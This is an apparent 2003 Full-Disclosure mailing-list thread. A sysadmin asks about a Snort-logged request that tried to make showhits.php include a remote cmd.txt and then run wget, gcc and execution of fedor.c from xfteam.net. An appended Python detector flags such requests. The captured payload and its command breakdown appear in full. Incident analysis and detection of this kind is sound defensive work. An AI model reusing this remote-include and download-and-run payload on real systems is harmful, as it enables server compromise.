Message-ID: <houp3p.901yz8@vmail.lockedbox.net>
From: root at freebox.mine.nu (root)
Subject: Re: http://xfteam.net/fedor.c - Anyone seen this before??

I realised my foobar, just after I had posted.
A tty capable daemon. Interesting.. Surely "they" realise that apache runs as a
separate user on most systems (who runs it as root?)
It was the only hit from that netblock so I guess that it was a scan.
And from looking at the google.jpg and the strings.txt I was led to:
http://www.arplhmd.cjb.net/
Looks like he makes some scripts/tools, noting a google tool which could
account for the attempt on a dead link.

Regards,
Daniel.

"Rev. Kronovohr" <kronovohr@...alaeon.net> wrote:

> resolve www.xfteam.net first, and it'll go through
> 
> Interesting attempt, BTW
> 
> On Mon, 2003-11-24 at 03:28, Dan wrote:
> > Hi,
> > Our Snort picked up an interesting attempt to download, compile and execute.
> > Noting also the fact that the sub dir it's attempting to access has not been
> > there for over 4 months (/logjam/)?
> > 
> > Has anyone actually seen what this fedor.c is? I have done some google'ing but
> > it comes up blank.
> > 
> > Has anyone else noticed this kind of request recently?
> > 
> > Is it just me or is xfteam.net not resolving anyway?
> > 
> > Original HTTP request:
> > GET /logjam/showhits.php?rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
> > 
> > Breaking this down we get(twice):
> > uname -a
> > cd /tmp
> > wget http://xfteam.net/fedor.c
> > gcc -o f fedor.c
> > ./f
> > 
> > 
> > Regards,
> > Daniel.
> > 
> > 
> > 
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
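
Added example, not part of the original thread: a Python check that decodes the quoted request the way the breakdown above does by hand, and flags the URL-valued include parameter together with the fetch/compile/execute chain. The function names and stage patterns are hypothetical heuristics; the request string is the one quoted in the thread, rejoined onto one line.

```python
import re
from urllib.parse import unquote

# Request line quoted in the thread, rejoined onto one line.
REQUEST = (
    "GET /logjam/showhits.php?rel_path=http://xfteam.net/cmd.txt?"
    "&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f?"
    "&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f"
)

# Hypothetical heuristics: the stages of the command chain seen in this request.
STAGES = [
    ("fetch", re.compile(r"^(wget|curl|fetch)\s")),
    ("compile", re.compile(r"^(gcc|cc)\s")),
    ("execute", re.compile(r"^\./\S+")),
]

def parse_params(request_line):
    """Split the query on '&' only, so ';' inside a value is preserved."""
    target = request_line.split(" ")[1]
    _, _, query = target.partition("?")
    params = []
    for field in query.split("&"):
        name, _, value = field.partition("=")
        # The capture leaves a stray '?' at the end of some values.
        params.append((name, unquote(value).rstrip("?")))
    return params

def analyse(request_line):
    remote, chains = [], []
    for name, value in parse_params(request_line):
        if re.match(r"(?i)(https?|ftp)://", value):
            remote.append((name, value))      # parameter carries a remote URL
        elif ";" in value:
            chain = [c.strip() for c in value.split(";") if c.strip()]
            if chain not in chains:           # the capture repeats cmd= twice
                chains.append(chain)
    stages = [label for chain in chains for cmd in chain
              for label, rx in STAGES if rx.match(cmd)]
    # Alert only when a remote include and a fetch-then-run chain coincide.
    alert = bool(remote) and {"fetch", "execute"} <= set(stages)
    return {"remote_include": remote, "chains": chains,
            "stages": stages, "alert": alert}

if __name__ == "__main__":
    print(analyse(REQUEST))
```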



